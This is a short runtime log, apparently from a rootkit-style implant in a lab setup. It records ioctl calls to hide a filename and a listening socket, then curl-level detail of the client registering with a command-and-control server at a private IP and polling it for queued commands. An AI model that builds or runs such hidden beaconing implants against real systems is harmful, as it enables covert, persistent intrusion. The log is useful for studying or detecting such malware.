hide_filename: send ioctl
Sending request to http://172.21.0.1:1234/c2/register/
POST payload: {"client_id":"865f7c43c63f91342df94eb5acc83f3e"}
hide_listening_socket: send ioctl
*   Trying 172.21.0.1:1234...
* Connected to 172.21.0.1 (172.21.0.1) port 1234 (#0)
> POST /c2/register/ HTTP/1.1
Host: 172.21.0.1:1234
Accept: */*
Content-Type: application/json
Content-Length: 48

* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Server: Werkzeug/3.0.3 Python/3.11.9
< Date: Tue, 27 Aug 2024 20:26:01 GMT
< Content-Type: application/json
< Content-Length: 20
< Connection: close
< 
* Closing connection 0
json response from server: {
    "status": "0"
}
successfully registered to c2
Sending request to http://172.21.0.1:1234/c2/new_command/
POST payload: {"client_id":"865f7c43c63f91342df94eb5acc83f3e"}
hide_listening_socket: send ioctl
*   Trying 172.21.0.1:1234...
* Connected to 172.21.0.1 (172.21.0.1) port 1234 (#0)
> POST /c2/new_command/ HTTP/1.1
Host: 172.21.0.1:1234
Accept: */*
Content-Type: application/json
Content-Length: 48

* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Server: Werkzeug/3.0.3 Python/3.11.9
< Date: Tue, 27 Aug 2024 20:26:01 GMT
< Content-Type: application/json
< Content-Length: 61
< Connection: close
< 
* Closing connection 0
json response from server: {
    "message": "No commands in queue",
    "status": "error"
}
Failed fetching new command: "No commands in queue"
